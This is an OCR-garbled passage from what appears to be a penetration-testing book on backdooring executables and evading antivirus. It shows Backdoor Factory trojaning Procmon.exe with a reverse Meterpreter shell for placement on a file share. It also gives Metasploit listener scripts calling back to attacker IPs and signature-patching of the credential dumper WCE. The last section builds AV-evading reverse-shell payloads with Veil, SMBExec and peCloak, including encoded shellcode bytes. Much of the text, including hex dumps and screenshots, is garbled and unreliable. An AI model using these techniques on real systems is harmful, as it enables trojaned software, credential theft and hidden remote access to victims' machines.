BxfbeOO End: 0x257800; Ceve begin: 0x22c9e3 End: 0x22cbc8 
OxfbeBO End: 0x257800; Ceve begin: 0x2307 C f End: 0x230984 
BxfbeOO End: 0x257860; Ceve begin: 0x23158b End: 0x231800 
0xfbeOO End: 6x257880; Ceve begin: 0x231e99 End: Qx23206f 
BxfbeOO End: 0x257800; Ceve begin: 0x234320 End: 0x2345c0 
BxfbeOO End: 0x257800; Ceve begin: 0x23562c End: 0x235768 
BxfbeOO End: 0x257800; Ceve begin: 0x2418f0 End: 0x2425f8, 
BxfbeOO End: 0x257800; Ceve begin: 0x247257 End: 0x24740c 
OxfbeBO End: 0x257800; Ceve begin: 0x248013 End: 0x248288 
0xfbeOO End: 0x257800; Ceve begin: 0x248921 End: Qx248ef7, 
BxfbeOO End: 0x257800; Ceve begin: 0x24ede8 End: 6>24b048 
BxfbeOO End: 0x257880; Ceve begin: 0x24c0b4 End: Qx24clf0 


Ceve Size 
Ceve Size 
Ceve Size 
Ceve Size 
Ceve Size 
Ceve Size 
Ceve Size 
Ceve Size 
Ceve Size 
Ceve Size 
Ceve Size 
Ceve Size 
Ceve Size 
Ceve Size 
Ceve Size 


0x257800 End: 0x263400; Ceve begin: 0x2601be End: 0x263400; Ceve SI. 


396 

417 

421 

485 

437 

629 

470 

672 

316 

3336 

437 

629 

470 

672 

316 

:e: 12870 


[!) Enter your selection: e 
•resetting shslls 

[*] Looking for end setting selected shellcode 
[•j Cresting Code Ceve 

- Adding e new section to the exe/dll for shellcode injection 
[•) Petching initial entry instructions 
[•) Creating Win32 resuee execution stub 
[•j Looking for and setting selected shellcode 
[•) Overwriting certificate table pointer 
[*] /root/Desktop/Proceon.exe beckdooring coeplete 
File /root/Oesktop/Proc eon.exe is In the 'beckdoored' directory 
:/oot/the*be<kij.u.i -t.t< tory# I 


Y7 


BDF Caves 













Once you find a cave that works, press “a” to append your code. After this is complete, BDF will 
drop the newly created executable in the folder backdoored. 


Now, take that file and put it back on the fileshare. The file should execute perfectly, the user will 
still have all the functionality of Procmon, but every time they run it, it will connect back to our 
Metasploit handler. 


:: 

r • it Open New foidtv 
rite* Nam* 


Atop 
wnloeds 
nri Place* 


Pimento 
Sic 
ure* 

(OS 

put** 

•iOkk(C) 

r*(\\DQ(£) 


• ' AddtaProcess.eie 
AddnProceM32«xe 
! r AdcflnUtieio* 

■’ 

■ ' Prmt 9 im(ngMw.n* 

5 Procmon.rue 
Jf pcoquota *** 

•' PushPrinterConne-cboro 
S r Q*ppw*»e 
•' qpfocns.cic 
* T query.*** 

•' rdpdipexc 
•’ R*Ag*ntc*xe 
recdisc.ci* 

• T Reg Asm*** 

aS6.mkrosoft-wvidovK 
*86.mioosott wrndowrv 
*86 miaosoft-wr*dows 
«86_micTO»o<t-we>dow»- 


b ager pc i 


*7 Process Monitor - Sysmtemah: wwwr.sysinlenviis.com 
14* Fdrt Event Filer Took Options Help 
► U vA+ ffl M* TEWTTOI 


Tmeo Process N* 
1718 3 ^Procmon 
1218 3 ^Procmon 
1718 3 ^Procmon 
17183 ^Procmon 
1218 3 ^Procmon 
1718 3 ^Procmon 
12183 ^Procmon 
1718 3 ^Procmon 
1218 3 ^Prooncn 
1718 3 ^Procmon 
17183 ^Procmon 
1718 3 *»Prremm 


PIO Operabon 
760 MHegQuwyVatuo 
260 SRegOurryVAw 
760 ^Thread Create 
760 ^ Thread Croalo 
760 <3f Thread Create 
760 Thread Create 
760 ^Thread Create 
760 A Thread Create 
760 MHegOpvrtey 
760 m . RwjQuwyVAie 
760 


MKl M System CunonlConliotSef Con lie 
MKLMSvstemCunenlConlJotSefCorilio 


MKLMMAftOWARfc D£ SCRIPT \OHSy% 
Mrtl MHAKOWAFieiOe SCRIPTIOWS* 
MWMKAKDWAHI IDESCHIPTIONSy* 
rO(1 M.SvMrwvrieienlCnnhnr^errviltn 


b. age* pc (Showing 86.131 oM29.914 events (66%) 
b.-ager 


Barced by virtual memory 


b..aqer-pcat.resoufce„ 7^13/2009 7:S6 PM MU 

Malicious Procmon 


Just in case you forgot how to create a handler for your file, this is what it will look like. On your 
Kali host, copy the following text to a file on /opt/listener.rc: 

• use exploit/multi/handler 

set PAYLOAD windows/meterpreter/reversehttps 
set LHOST <Your Kali IP> 
set LPORT 8080 
set ExitOnSession false 
exploit -j -z 


To start your listener, use the following command: 
• msfconsole -r /opt/listner.rc 










■ k.fl !:/opt/the-backdoor-factory# msfconsole -r /opt/listner.rc 
I*] Starting the Metasploit Framework console...| 


I 

I 


Save 45% of your time on large engagements with Hetasploit Pro 
Learn more on http://rapid7.com/metasploit 

-I metasploit v4.11.0-2014122301 [core:4.11.O.pre.2014122301 apiil.O.O]] 

+ -- --=( 1379 exploits - 777 auxiliary - 222 post ] 

+ -- ---[ 342 payloads - 37 encoders • 8 nops j 

+ -- --=( Free Hetasploit Pro trial: http://r-7.co/trymsp j 

l*] Processing /opt/listner.rc for ERB directives. 

resource (/opt/listner.rc)> use exploit/multi/handler 

resource (/opt/listner.rc)> set PAYLOAD windows/meterpreter/reverse_https 

PAYLOAD => windows/meterpreter/reverse_https 

resource (/opt/listner.rc)> set LHOST 172.16.151.128 

LHOST -> 172.16.151.128 

resource (/opt/listner.rc)> set LPOKT 8080 

LPORX => 8080 

resource (/opt/listner.rc)> set ExitOnSession false 
ExitOnSession => false 
resource (/opt/listner.rc)> exploit -j -z 
[*] Exploit running as background job. 

(*] Started HTTPS reverse handler on https://0.0.0.0:8080/ 
l*] Starting the payload handler... 
msf exploit (harun pi) >| 


Meterpreter Session 


Hiding WCE From AV (windows) 


I love Windows Credential Editor (WCE) because it can take clear text passwords from memory. 
However, the problem with WCE is that all AV vendors pretty much flag this executable. The quick 
and simple way to bypass AV is through a process of identifying where the AV signature is inside the 
WCE file and modifying it. 


Example: Evade 

thttps://www.securepla.net/antivirus-now-you-see-me-now-you-dontH (Windows) 

On your Windows host, open Evade (Evade takes that executable and makes multiple versions of that 
file based on the defined size. Let's say you have a 50k file and you wanted to split the file by 5k. It 
will make 10 different versions of that file. The first one will only be the first 5k of the file (will 
contain the MZ header and some additional information). The second file will include the first 5k and 
include the next 5k of data. This goes for the rest of the files. 


In the following examples, we loaded WCE, defined an output location and hit Split! If we look in the 
folder defined in our output, we see that it chopped up the files. 






Evade 


i lr^ft C:\Demo\wce_parse 

and Folder Tasks 

Make a new folder 

Publish this folder to the 
Web 

Share this folder 


er Places 
Demo 

My Documents 
Shared Documents 
My Computer 
My Network Places 



Name 

Size 

~"1 Test File 5Q00.exe j 

5 KB 

1 T estFile_l 0000. exe 

10 KB 

"1 T estFile_l 5000. exe 

15 KB 

~”1 TestFile_20000. exe 

20 KB 

~1 TestFile_2SOOO. exe 

25 KB 

1 TestFile_3O000. exe 

30 KB 

~"1 T estFile_35000. exe 

35 KB 

"1 T estFile_40000. exe 

40 KB 

n TestFile_45000. exe 

44 KB 

1 T estFile_5O000. exe 

49 KB 

"1 T estFile_5S000. exe 

54 KB 

~"1 TestFile_6O000. exe 

59 KB 

3 TestFile_65000. exe 

64 KB 

3 TestFile_70000. exe 

69 KB 

3 T estFile 75000. exe 

74 KB 


Evade Output 


We should have a bunch of different files. If we open a hex editor (HxD) and look at one of the files, 
we see that the first 5000 bytes are in the first file and 10,000 bytes are in the second file. 
































il THffc_5000.exe | Tm He_IOOOO.exe 


Offset (h) 

00 

01 

02 

03 

04 

05 

06 

07 

08 

09 

OA 

OB 

oc 

0D 

OE 

or 


000012C0 

83 

C4 

04 

6A 

01 

E8 

62 

AC 

00 

00 

EB 

B8 

83 

7D 

EC 

01 

fA.j.6b-...e.m. 

000012DO 

73 

14 

68 

CC 

04 

42 

00 

m 

oc 

II 

00 

00 

6 3 

C4 

04 

6A 

a. hi.B.*.¥../A.3 

000012EO 

01 

E8 

41 

AC 

00 

00 

et 

45 

er 

00 

8B 

4 r 

EC 


04 

05 

.41*1. .IE. .< Eil . 

oooo12ro 

68 

FT 

rr 

rr 

00 

01 

8D 

(0 

IT 

rr 

If 

81 

-1 

55 

OC 

52 

hyyy...hyyycxu.R 

00001300 

C8 

8B 

■t 

00 

00 

83 

C4 

03 

C7 

48 

EC 

00 

00 

00 

OU 

HE 

*<E../A.gEi....< 

00001310 

IS 

10 

33 

00 

01 


43 

80 

H 

40 

e: 

or 

11 

11 

83 

FA 

Ea>'A.t.Ea« Ha.V.fu 

00001320 

3A 

74 

3A 

N 

45 

EC 

88 

4D 

EC 

8A 

11 

68 

54 

OS 

B8 

8B 

it:«Ei< Has.~ t. ,< 

00001330 

45 

EC 

3: 

CO 

01 

89 

45 

e: 

88 

4D 

E. 

09 

Cl 

01 

89 

4D 

El/A.tEi' HaM.tft 

00001340 

EO 

83 

7D 

EC 

26 

76 

14 

68 

C4 

0 A 

42 

00 

M 

07 

A4 

00 

if)Hv.hA.B.<F-». 

00001350 

00 

63 

C4 

E 4 

6A 

01 

E. 

D1 

AB 

00 

00 

EE 

11 

83 

7D 

EC 

./A.J.iS«..8»/)i 

00001360 

01 

73 

14 

68 

yo 

09 

42 

00 

E8 

78 

M 

00 

00 

83 

C4 

04 

.s.to.B.ei■../A. 

00001370 

6A 

0: 

E8 

OS 

At 

uu 

oo 

•Co 

48 

Dr 

00 

tfc 

88 

EC 

C6 

44 

}.*»«.. £E6.<Ui£D 

00001380 

IS 

88 

00 

I 

45 

88 

BO 

1 









....E.P< 


HEX Output at 5000 8ytes 


2!) Testfto_5000.exe =1 TKtffcJOOOO.exe 


Offset(h) 

00 

01 

02 

03 

04 

OS 

06 

07 

08 

09 

OA 

OB 

OC 

OD 

OE 

or 



000025E0 

A1 

7 3 

4E 

4.: 

mi 

A3 

7C 

41 

42 

00 

HE 

8D 

74 

4 E 

rr 

rr 

i xNB 

.£INB.< .t >yy 

00002sro 

69 

C3 

E 

03 

00 

00 

51 

rr 

15 

AC 

DO 

41 

00 

E9 

3D 

rt 

l te. 

. .0y.-iDA.8"p 

00002 600 

rr 

FF 

E9 

25 

01 

00 

00 

33 

BD 

BO 

9B 

FF 

FF 

01 

75 

44 

yy«v 

...jut >yy.uD 

00002610 

83 

3D 

74 

4E 

42 

00 

00 

75 

19 

8B 

IS 

60 

4E 

42 

00 

52 

f-tNB..u.<.NB.R 

00002620 

6A 

00 

C8 

79 

2E 

00 

00 

83 

S4 

08 

89 

PS 

C8 

9B 

rr 

rr 

J.*v 

. ../A.^t>yy 

00002630 

EB 

22 

83 

ip 

74 

4E 

42 

nr 

01 

7 ' 

19 

A1 

m 

4E 

42 

00 

e-f- 

CN8.« U. , NB. 

00002640 

50 

•3 3 

AO 

80 

42 

00 

e: 

55 

ZI 

3 0 

00 

6 9 

C4 

08 

39 

PS 

Ph * 

B.4U. . ./A.V, 

00002650 

C8 

9B 

FF 

rr 

83 

BD 

CO 

9B 

rr 

FF 

CO 

75 

ID 

83 

IP 

6C 

ExyyfME >yy.u./-l 

00002660 

4E 

4.. 

00 

01 

78 

14 

r.r 

M 

n 

4- 

CO 

86 

98 

91 

00 

00 

NB.. 

u.h .B.ex'.. 

00002670 

83 

C4 

04 

6A 

01 

E8 

B2 

98 

00 

00 

83 

BD 

ce 

9B 

rr 

rr 

fA.J 

.4**. .f*i£ >yy 

00002 680 

00 

75 

71 

E8 

18 

03 

00 

00 

85 

CO 

75 

4D 

63 

i E 

> i 

DB 

.uqe 

....-AuH/HoU 

00002 690 

rr 

rr 

00 

75 

ID 

68 

20 

62 

42 

00 

68 

8A 

8A 

00 

00 

6A 

yy.u 

■h bB.hSS.o 

00002 6AO 

00 

ro 

15 

A4 

M 

41 

00 

00 

M 

C3 

ID 

00 

uu 

98 

C4 

DC 


DA.P41.../A. 

00002 6BO 

85 

CO 

7S 

14 

88 

BC 

11 

42 

00 

EH 

2A 

91 

00 

00 

83 

C4 

Au. 

hi.B.4*'.A 

000026C0 

04 

6A 

01 

E8 

64 

98 

00 

310 

37 

85 

M 

DB 

rr 

rr 

01 

00 

.g_oOyy.. 

00002 6D0 

00 

C 3 

E 3 

Ey 

EE 

FF 

FF 

EB 

IB 

63 

IP 

60 

41 

42 

OO 

00 

..A* 

nb.. 

00002 6EO 

74 

OD 

68 

14 

i: 

42 

00 

Ec 

re 

M 

CO 

CO 

83 

C4 

9 4 

E 

t.h. 

•B.4U.../A.4 

000026ro 

1C 

r r 

00 

00 

1=13 

3D 

80 

4E 

42 

00 

00 

74 

r :• 

68 

A4 

11 


/- NB.. t. h«. 

00002700 

42 

M 

M 

11 

90 

on 

00 

83 

C4 

04 

E8 

31 

e; 

FF 

rr 

83 

B.ea 

.../A.*i*yyf] 


HEX Output at 10000 Bytes 

File Comparison 


If we open up our calculator, we can see if we subtract the hex values 270F - 1387, we get 1388. 
Converting 1388 to Decimal, we get 5000. Perfect! 


Start with the smallest file (5k) and scan that file with your AV of choice. Does an AV signature 
trigger on that file? If no, keep going through each version of that file. When you finally do get AV to 
trigger, you know that something between the last file and the clean file contains the string that the 
Antivirus program looks for. 










t Jt * wce_p«cse 


v c 


ids 

slices 


Name 

B Testfile.SOOO 
H T««fik_10000 

3 Tetfile.15000 

1 Testfile .20000 
3 T«lf.le_25000 

2 Ttitf.lt.30000 

3 Testfllt.35000 
3 Teflf ile.40000 
3 T«tf.lt45000 

.1 Testfile.50000 
B Ttitfilt.55000 
_ Testfile.60000 
Ttstfilt.65000 
Ttstfllt.70000 
Ttitfilt.75000 
Ttitf.lt.80000 
T«tfilt_85000 
B Tetfilt.90000 
B Tetf ilt.95000 
1 T«tf .lt.100000 
3 Ttslf.lt 100000 


Date modified 


1/2013 3:IS PM 
i/2013 3:15 PM 
i/2013 3:15 PM 
i/2013 3:15 PM 


2013 


/2013 3: 
/2013 3: 
/2013 3: 


“6/2013 3 
6/2013 3 
6/2013 3 
6/201L] 


5 PM 
3 PM 
3 PM 
3 PM 
3 PM 
3 PM 
3 PM 
3 PM 

sm. 


Type 

Application 

Application 

Application 

Application 

Application 

Application 

Application 

Application 

Application 

Application 

Application 

Application 


Sue 


S KB 
10 KB 
IS KB 
20 KB 
25 KB 
30 KB 
35 KB 
40 KB 
44 KB 
49 KB 
54 KB 
59 KB 

>:P. 



X Potentially Unwanted Program Blocked 


UcAIm pr»v»nt«d a potentially unwantto program from running 
Protect your PC by only allowing programs you bust 

More « 


Remove 


Allow 


Close 


Finding Which File Triggers AV 


When dropping the folder containing all of the split files, AV instantly starts alerting the user about 
malicious files and starts cleaning up. When the cleanup is complete, we now see that all the files are 
still present in that folder before TestFilel 30000. That means between the 125000 bytes mark and 
130000 bytes mark of the file is the trigger IDS signatures. 


Let's see what is at that location. If we convert the Decimal of 125000 to HEX we get 1E848. Let's 
take a look in HxD to see what is there. From the location 1E848, we can look around to see what 
caused the signature to fire or we can run Evade again to get more granular. 


In this case, it looks like I was able to identify what the IDS signature is looking for-it looks for the 
name of the application and the owner. 













Jj| TestFte.5000.exel TertFteJC000.exe | TwtFie_130000.exe U) wce 2.exe j “I wce.exe 
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000IF600 

67 

20 

74 

65 

72 

72 

69 

62 

6C 

65 

20 

68 

61 

70 

70 
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74 

20 

61 

ned 1 could noc 

a 

0001F620 

6C 

6C 

6F 

63 

61 

74 

65 

20 

6D 

65 

6D 

6F 

72 

79 

20 

66 

1locate memory 

t 

0001F630 

6F 

72 

20 

6E 

65 

77 

20 

6C 

69 

73 

74 

21 

OA 

00 

00 

00 

or neu list!... 

,, 


0001F640 

57 

43 

45 


25 

73 

20 


57 

69 

6E 

64 

6F 



2( 



000ir650 

43 

72 

65 

64 

65 

6E 

74 

69 

61 

6C 

73 

20 

45 

64 

69 

74 



0001F660 

6F 

72 

29 


2D 


28 

63 

29 

20 

32 

30 

31 

30 

2D 




0001F670 

30 

31 

33 

20 

41 

6D 

70 

6C 

69 

61 

20 

S3 

65 

63 

75 

72 



0001F680 

69 

74 

79 

20 

2D 

20 

62 

79 

20 

48 

65 

72 

6E 

61 

6E 

2 C 


if 

0001F690 

4F 

63 

6R 

6F 

61 

20 


68 

65 

72 

6E 

61 

6E 

40 

61 

61 



0001F6A0 

70 

6C 

69 

61 

73 

65 

63 

75 

72 

69 

74 

79 

2E 

63 

6F 

61 



0001F660 

y 

OA 

00 

00 

55 

73 

6S 

20 

2D 

68 

20 

66 

6F 

72 

20 

68 

|.. .Use -h for h 


Identifying the String that Triggers AV 


With HxD, we can write over these values and save our executable to a new file. 


Is) TertFte.5000.exe 

^ TestFile 

_10000.exe 

TestFile_130000.exe 

(2 

| wce2.exe 

jf) wce.exe 

Offset(h) 

00 

01 

02 

03 

04 

05 

06 

07 

08 

09 

OA 

OB 

OC 

OD 

OE 

OF 


0001F4F0 

25 

2E 

32 

58 

25 

2E 

32 

58 

25 

2E 

32 

58 

25 

2E 

32 

58 

4.2X4.2X4.2X4.2X 

0001F500 

25 

2E 

32 

58 

25 

2E 

32 

58 

25 

2E 

32 

58 

25 

2E 

32 

58 

4.2X4.2X4.2X4.2X 

0001F510 

25 

2E 

32 

58 

25 

2E 

32 

58 

25 

2E 

32 

58 

25 

2E 

32 

58 

4.2X4.2X4.2X4.2X 

0001F520 

25 

2E 

32 

58 

25 

2E 

32 

58 

25 

2E 

32 

58 

25 

2E 

32 

58 

4.2X4.2X4.2X4.2X 

0001F530 

00 

00 

00 

00 

55 

73 

69 

6E 

67 

20 

57 

43 

45 

20 

57 

69 

_Using UCE Ui 

0001F540 

6E 

64 

6F 

77 

73 

20 

53 

65 

72 

76 

69 

63 

65 

2E 

2E 

2E 

ndows Service... 

0001F550 

OA 

00 

00 

00 

61 

62 

00 

00 

46 

6F 

72 

63 

65 

64 

20 

S3 

....ab..Forced S 

0001F560 

61 

66 

65 

20 

4D 

6F 

64 

65 

20 

45 

72 

72 

6F 

72 

3 A 

20 

afe Rode Error: 

0001F570 

63 

61 

6E 

6E 

6F 

74 

20 

72 

65 

61 

64 

20 

63 

72 

65 

64 

cannot read cred 

0001F580 

65 

6E 

74 

69 

61 

6C 

73 

20 

75 

73 

69 

6E 

67 

20 

27 

73 

entials using 's 

0001F590 

61 

66 

65 

20 

6D 

6F 

64 

65 

27 

2E 

OA 

00 

OD 

OA 

00 

00 

afe mode'. 

0001F5A0 

61 

62 

00 

00 

25 

2E 

38 

58 

3A 

00 

00 

00 

25 

73 

3 A 

25 

ab..4.8X:...4s:4 

0001F5B0 

73 

3A 

00 

00 

25 

2E 

32 

S8 

00 

00 

00 

00 

3A 

00 

00 

00 

s:. .4.2X_:... 

0001F5C0 

25 

2E 

32 

58 

00 

00 

00 

00 

25 

2E 

38 

58 

3 A 

00 

00 

00 

4.2X_4.8X:... 

0001F5D0 

25 

73 

3A 

25 

73 

3A 

00 

00 

25 

2E 

32 

58 

00 

00 

00 

00 

4s:4s:..4.2X_ 

0001F5E0 

3 A 

00 

00 

00 

25 

2E 

32 

58 

00 

00 

00 

00 

61 

62 

00 

00 

:...4.2X_ab.. 

0001F5F0 

OD 

OA 

00 

00 

OA 

00 

00 

00 

73 

6F 

6D 

65 

74 

68 

69 

6E 


0001F600 

67 

20 

74 

65 

72 

72 

69 

62 

6C 

65 

20 

68 

61 

70 

70 

65 

g terrible happe 

0001F610 

6E 

65 

64 

21 

20 

63 

6F 

75 

6C 

64 

20 

6E 

6F 

74 

20 

61 

ned! could not a 

0001F620 

6C 

6C 

6F 

63 

61 

74 

65 

20 

6D 

65 

6D 

6F 

72 

79 

20 

66 

1locate memory f 

0001F630 

fr 

7 i 

i 9 

f E 

ff 

77 

S9 

N? 

?? 

7 ? 

74 

i\ 

OA 

99 

99 

99 

or ne« list'- 

0001F640 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

AAAAAAAAAAAAAAAA 

0001F650 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

AAAAAAAAAAAAAAAA 

0001F660 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

AAAAAAAAAAAAAAAA 

0001F670 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

AAAAAAAAAAAAAAAA 

0001F680 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

AAAAAAAAAAAAAAAA 

0001F690 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

AAAAAAAAAAAAAAAA 

0001F6A0 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

AAAAAAAAAAAAAAAA 

0001F6B0 

41 

OA 

00 

00 

55 

73 

65 

20 

2D 

68 

20 

66 

6F 

72 

20 

68 

A...Use -h for h 

0001F6C0 

i!> 


elp.Options: 


Modifying the Signature to Evade AV 


I wrote over those values with all A's and saved my file as wce2.exe. Luckily, the signature in this 
case was not actually part of the binary executable, but part of the application output. Let's take our 























sample to the AV box and run the scan again. 


1_J Nimt Uate modified Type 5iR 

@0 wce2 Application 195 K 



Issues 

0 


Your computer is secure (no action required) 


Scan is done 

>/ McAfee did not detect any issues on your PC 
No further action is required 


Successful AV Scan 


H Home 
<•> Havigat 
« About 
? Help 



Done 


After scanning the file, AV was no longer able to pick up the file and the application still ran 
perfectly. One thing to note here is that this worked because the values we modified in the file did not 
impact the execution of the executable. If the signature was based on code that couldn't be modified to 
run, we would not be able to use this trick. I just wanted to demonstrate some weaknesses with AV 
and the concept of how to bypass them. 


Veil 

f https://github.com/Veil-Framework ) (Kali Linux) 


Veil is a Payload Generator to Bypass Antivirus tool created by Christopher Truncer. This tool uses a 
lot of different methods to evade AV but it is best known for taking the Meterpreter shell, converting 
it to python, and wrapping it around py2exe/pyinstaller. This way the executable can bypass a lot of 
white-listing tools and AV This is because python is usually an approved white-listed application 
and can be easily encoded so that it can bypass AV There are a lot of different ways to use Veil, but I 
will go over the most general. 

• cd /opt/Veil/Veil-Evasion 

• ./Veil-Evasion.py 

• To see all payloads 

o list 

• We are going to use python/meterpreter/rev https 

o use 25 

o set LHOST [Your Kali IP] 
o generate 
o use pyinstaller 







Veil-Evasion | [Version]: 2.17.0 


[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework 


[*] Executable written to: /root/veil-output/compiled/undetected.exe 
Language: python 

Payload: python/mete rp rete r/rev_https 

Required Options: LH0ST=172-16.151.141 LP0RT=8443 compileJo_exe=Y 

use_pyherion=N 

Payload File: /root/veil-output/source/undetected.py 

Handler File: /root/veil-output/handlers/undetected_handler.rc 


[*] Your payload files have been generated, don’t get caught! 

[!] And don't submit samples to any oi4CTTt/S» 

K/ 

[>] press any key to return to the main menu: 


Veil-Evasion 



The output results in two files: 

1. Under /root/veil-output/compiled/ is the executable to drop on the Windows system 

2. The other file /root/veil-output/handlers/undetectedhandler.rc is the Metasploit handler file. 


First, set up the listener for the handler: 

• msfconsole -r /root/veil-output/handlers/undetected handler.rc 


Execute the payload on the Windows victim host: 



Veil-Evasion - Python 


I highly recommend testing with the Ruby executable as well. Instead of using the payload 
python/meterpreter/rev https, select ruby/meterpreter/revhttps. The process is the same, but instead 
of a pyinstaller executable, it is a Ruby executable. 

















resource (/root/veil-output/handlers/rubyindetectedHandler.rcj* set PAYLOAD wil 
ndows/meterpreter/revers@_http — 

|PAYL0AD => windows/i»eterpreter/reverse_http 

resource (/root/veil-output/handlers/ruby_uHdetected handler.rc)> set LHOST 172.| 
LHOST •> 172.16.151.141 

resource (/root/veil-output/har>dlers/ruby_indetected handler.rc)> set LPORT 8123 
LPORT => 8123 

resource (/root/veil-output/handlers/njby_undetected_handler.rc)> set ExitOnSess| 
ion false 

ExitOnSession => false 

resource (/root/veil-output/handlers/ruby ixidetected handler.rc)> exploit -j 
1*1 Exploit running as background job. 


A % 


! 


n i 


1*1 Started HTTP reverse handler on http://0.0.8.0:8123/ 

1*1 Starting the payload handler... 

|msf exploit! ) » Cl 172.16.151.202:49501 Request received for AIEZf... 

1*1 172.16.151.202:49501 Staging connection for target /WEZf received... 



1*1 Heterpreter session 1 opened (172. 
t 2015-33-06 16:01:50 -0500 
sessions -i 1 

1*1 Starting interaction with 1... 


Why pick Ruby over python? This is all about testing which works best for the environment in which 
you are testing. I have seen instances where AV might pick up one type of file, but will not pick up 
another. Keep testing and you will find the best solution for your current situation. 


SMBExec 

f https://github.com/pentestgeek/smbexec VKali Linux) 

SMBExec is a tool developed by bravOhax (https://github.com/bravOhax/smbexec), which contains a 
lot of different functionalities. In this book, we have used the tool to pull hashes from a domain 
controller, but it can also be used to enumerate shares, validate logins, disable UAC, and create an 
obfuscated Meterpreter executable. BravOhax utilizes a number of different obfuscation techniques, 
including randomization and compiling it in native C to bypass AV (read the source code of 
smbexec.sh). This is what we are going to use to create our reverse shell. 

To create an obfuscated reverse Meterpreter executable: 

• cd /opt/smbexec 

• ./smbexec.sh 

• Select System Access with the following command: 

o 2 

• Select Create an executable and rc script 

o 2 

• Select windows/meterpreter/reverse_https 

o 2 

• Enter your local host and port 

o 172.16.139.209 
o443 






Once SMBExec finishes and you exit out of the application, a new folder is created in that same 
directory. It follows a similar timestamp folder name. Inside that folder, you will see the 
backdoor.exe, which is your obfuscated reverse https Meterpreter executable. 

root@kali:/opt/smbexec/2015-03-23-1425-smbexec# Is -alh 
-rwxr-xr-x 1 root root 110K Mar 23 14:28 backdoor.exe 
-rw-r—r— 1 root root 283 Mar 23 14:28 metasetup.rc 
-rw-r—r— 1 root root 92 Mar 23 14:28 shal-backdoor.hash 

In that same folder you will also see the metasetup.rc script. RC scripts will be discussed a little later 
in the book, but if you take a look at the file, you will see something similar to the code below: 


• spool /opt/smbexec/2015-03-23- 1425-smbexec/msfoutput- 1425.txt 

• use exploit/multi/handler 

• set payload windows/meterpreter/reverse_https 

• set LHOST 172.16.139.209 

• set LPORT 443 

• set SessionCommunicationTimeout 600 

• set ExitOnSession false 

• set InitialAutoRunScript migrate -f 

• exploit -j -z 


This is a script that automatically configures and runs a reverse handler for the payload you just 
generated. It also adds commands, such as setting up timeouts and automigrating PIDs. To run the RC 
script, use the following command: 

• msfconsole -r metasetup.rc 


PeCloak.py 

f http://www.sccuritysift.com/pccloak-py-an-cxpcrimcnt-in-av-cvasion/ l (Windows) 


peCloak.py is a python script that takes an automated approach to AV evasion. Although this is 
experimental code, I really like what Mike Czumak did. He took many of the common evasion tricks 
and wrote something to automate them. He built a simple encoder/decoder, added a number of 
instructions that waste cycles in an effort to trick the AV scanner, and utilized code caves (like we 
discussed with The BackDoor Factory). 


Installation does take a few steps and this was installed on a 32bit Windows XP system: 

• Download http://www.securitysift.com/download/peCloak.py 

• Install 
http:// sourceforge.net/proj ects/winappdbg/ files/additional%20packages/PyDasm/ 

• Install https://code.google.eom/p/pefile/downloads/list 

• Save 


“http://git.n0p.ee/? 



p=SectionDoubleP.git;a=blob_plain;t=SectionDoubleP.py;h=93717cdd0ac293548fb9S 
as SectionDoubleP.py 

I also had to also modify the peCloak.py file: 

• On Line 220 - 1 had to change “pe.write(pe.OPTIONAL_HEADER.SizeOfHeaders, 
filename=fiiame) # MODIFIED WRITE FUNCTION IN PEFILE!!!” to 
“pe.write(‘cloaked.exe’)” 


Once we get peCloak.py running, we can test this on a copy of wce.exe: 

• python.exe peCloak.py-e .text,.data:50:5000 wce.exe 


!:\covert>C:\Python27\python.exe C:\covert\peCloak.py -e .text,.data:50:S000 wce.exe 


peCloak.py (beta) 

| A Multi-Pass Encoder 8 Heuristic Sandbox Bypass AV Evasion Tool 

Author: Hike Czumak | T_V3rnlx | gSecuritySlft 
| Usage: peCloak.py [options] [path_to_pe_file] (-h or --help) 



ASIR disabled 

Searching for suitable code cave location... 

[♦] Searching .text section... 

(«] Searching .rdata section... 

[♦] Searching .data section... 

[a] Searching .rsrc section... 

[♦] At least 1060 null bytes found in .rsrc section to host code cave 
PE .rsrc section aade wrlteable with attribute 0xE0000020 
Code cave located at 0x4324dS 
PE Section Information Summary: 

[a] Name: .text , Virtual Address: 0x1000, Virtual Size: 0xlbc26, Characteristics: 
(♦) Name: .rdata , Virtual Address: 0xld000, Virtual Size: 0x2e98, Characteristics: 

[♦] Name: .data , Virtual Address: 0x20000, Virtual Size: 0x7758, Characteristics: 

[♦] Name: .rsrc , Virtual Address: 0x28000, Virtual Size: 0xa870, Characteristics: 

[♦] Name: .reloc , Virtual Address: 0x33000, Virtual Size: 0xld2c, Characteristics: 

Preserving the following entry instructions (at entry address 0x410311): 

[♦] call 0x416ed8 

Generated Heuristic bypass of 3 iterations 
Generated Encoder with the following instructions: 


0x60000020 

0x40000040 

0XC00000401 

0xe0000620l 

0x42000046 


lpeCloak.py Beta 


As we can see, it will go through all of the evasion techniques and produce an output file called 
“cloaked.exe”. In the image below, we take our modified binary and run it to make sure it executes 
normally. When executing, you will notice it does take longer before it runs after execution due to all 
the extra instructions added by peCloak.py. 






[*] Writing code cave to file 
[+] Heuristic Bypass 
[+] Decoder 

[+] Saved Entry Instructions 
[+] lump to Restore Execution Flow 
[+j Final Code Cave (len-223): 

90909090909031f631ff434b33c0434b905331db 

40903d386dS51475f0434b434b9c9d90909033c0 

434b405131c95940483d79b48el275ef5131c959 

31db5b90909033c05131c95940434b434b434b3d 

c7c91275ee4149909090b832004200424a414980 

389c9d5331db5b8000e890908030c95331db5b40 

8030a26061908028f860618030a440488000ea40 

bal342007eca9090b800104000424a6061803038 

8000e89c9d8030c95331db5b8030a29c9d424a80 

f89c9d8030a45231d25a908000ea403d26cc4100 

cd9090e82949feffe962ddfdff 

cloaked.exe 

[*] New file saved [cloaked.exe] 

C:\covert>cloaked.exe -h 

WCE vl.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by 

Use -h for help. 

Options: 

-1 
-s 

-r 


peCloak.py - Cave Jumps 


